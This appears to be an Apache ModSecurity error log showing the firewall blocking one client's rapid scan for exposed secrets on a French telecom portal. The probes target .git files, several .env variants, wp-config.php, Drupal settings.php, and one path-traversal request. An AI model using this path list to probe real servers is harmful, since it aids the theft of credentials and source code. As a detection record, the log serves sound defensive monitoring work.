[Mon May 11 15:23:16.668117 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:3588] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRKO9RdIr1DwxYR2S8wAAANI"]
[Mon May 11 15:23:16.668250 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:3588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRKO9RdIr1DwxYR2S8wAAANI"]
[Mon May 11 15:23:16.668444 2026] [security2:error] [pid 1320674:tid 1320707] [client 195.178.110.133:3588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRKO9RdIr1DwxYR2S8wAAANI"]
[Mon May 11 15:23:16.668713 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRKy-5-wpj6Sx56aY8wAAAAw"]
[Mon May 11 15:23:16.668824 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRKy-5-wpj6Sx56aY8wAAAAw"]
[Mon May 11 15:23:16.669008 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRKy-5-wpj6Sx56aY8wAAAAw"]
[Mon May 11 15:23:16.671629 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYROSQ-m-m0ukSShuCMwAAAUg"]
[Mon May 11 15:23:16.671761 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYROSQ-m-m0ukSShuCMwAAAUg"]
[Mon May 11 15:23:16.671963 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYROSQ-m-m0ukSShuCMwAAAUg"]
[Mon May 11 15:23:16.672129 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:3574] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRFchVQ3tCn0m9OpZXAAAAQQ"]
[Mon May 11 15:23:16.672266 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:3574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRFchVQ3tCn0m9OpZXAAAAQQ"]
[Mon May 11 15:23:16.672473 2026] [security2:error] [pid 1319885:tid 1319892] [client 195.178.110.133:3574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRFchVQ3tCn0m9OpZXAAAAQQ"]
[Mon May 11 15:23:16.673066 2026] [security2:error] [pid 1319953:tid 1319955] [client 195.178.110.133:3542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYROSQ-m-m0ukSShuCNAAAAUA"]
[Mon May 11 15:23:16.673197 2026] [security2:error] [pid 1319953:tid 1319955] [client 195.178.110.133:3542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYROSQ-m-m0ukSShuCNAAAAUA"]
[Mon May 11 15:23:16.673893 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S9QAAANM"]
[Mon May 11 15:23:16.674013 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S9QAAANM"]
[Mon May 11 15:23:16.674136 2026] [security2:error] [pid 1319953:tid 1319955] [client 195.178.110.133:3542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYROSQ-m-m0ukSShuCNAAAAUA"]
[Mon May 11 15:23:16.674225 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRKO9RdIr1DwxYR2S9QAAANM"]
[Mon May 11 15:23:16.674426 2026] [proxy_fcgi:error] [pid 1320674:tid 1320713] [client 195.178.110.133:3288] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.683914 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRFchVQ3tCn0m9OpZXQAAARM"]
[Mon May 11 15:23:16.684054 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRFchVQ3tCn0m9OpZXQAAARM"]
[Mon May 11 15:23:16.684326 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.133:3610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRFchVQ3tCn0m9OpZXQAAARM"]
[Mon May 11 15:23:16.684922 2026] [core:error] [pid 1320398:tid 1320423] [client 195.178.110.133:3514] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:16.685792 2026] [security2:error] [pid 1319886:tid 1319905] [client 195.178.110.133:3668] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYRKy-5-wpj6Sx56aY9AAAAAQ"]
[Mon May 11 15:23:16.685953 2026] [security2:error] [pid 1319886:tid 1319905] [client 195.178.110.133:3668] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYRKy-5-wpj6Sx56aY9AAAAAQ"]
[Mon May 11 15:23:16.686898 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRKy-5-wpj6Sx56aY9QAAAAw"]
[Mon May 11 15:23:16.687014 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRKy-5-wpj6Sx56aY9QAAAAw"]
[Mon May 11 15:23:16.687205 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:3684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRKy-5-wpj6Sx56aY9QAAAAw"]
[Mon May 11 15:23:16.687372 2026] [security2:error] [pid 1319886:tid 1319905] [client 195.178.110.133:3668] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYRKy-5-wpj6Sx56aY9AAAAAQ"]
[Mon May 11 15:23:16.688476 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYROSQ-m-m0ukSShuCNQAAAUg"]
[Mon May 11 15:23:16.688596 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYROSQ-m-m0ukSShuCNQAAAUg"]
[Mon May 11 15:23:16.688787 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:3558] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYROSQ-m-m0ukSShuCNQAAAUg"]
[Mon May 11 15:23:16.691476 2026] [security2:error] [pid 1319953:tid 1319955] [client 195.178.110.133:3542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYROSQ-m-m0ukSShuCNgAAAUA"]
[Mon May 11 15:23:16.691595 2026] [security2:error] [pid 1319953:tid 1319955] [client 195.178.110.133:3542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYROSQ-m-m0ukSShuCNgAAAUA"]
[Mon May 11 15:23:16.691775 2026] [security2:error] [pid 1319953:tid 1319955] [client 195.178.110.133:3542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYROSQ-m-m0ukSShuCNgAAAUA"]
[Mon May 11 15:23:16.691897 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRKO9RdIr1DwxYR2S-AAAANM"]
[Mon May 11 15:23:16.692017 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRKO9RdIr1DwxYR2S-AAAANM"]
[Mon May 11 15:23:16.692220 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:3648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRKO9RdIr1DwxYR2S-AAAANM"]
[Mon May 11 15:23:16.693572 2026] [security2:error] [pid 1320398:tid 1320405] [client 195.178.110.133:3622] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYROJEyNRN152ArOSNIwAAAEU"]
[Mon May 11 15:23:16.693694 2026] [security2:error] [pid 1320398:tid 1320405] [client 195.178.110.133:3622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYROJEyNRN152ArOSNIwAAAEU"]
[Mon May 11 15:23:16.693888 2026] [security2:error] [pid 1320398:tid 1320405] [client 195.178.110.133:3622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYROJEyNRN152ArOSNIwAAAEU"]
[Mon May 11 15:23:16.694105 2026] [proxy_fcgi:error] [pid 1320674:tid 1320713] [client 195.178.110.133:3288] AH01071: Got error 'Primary script unknown'
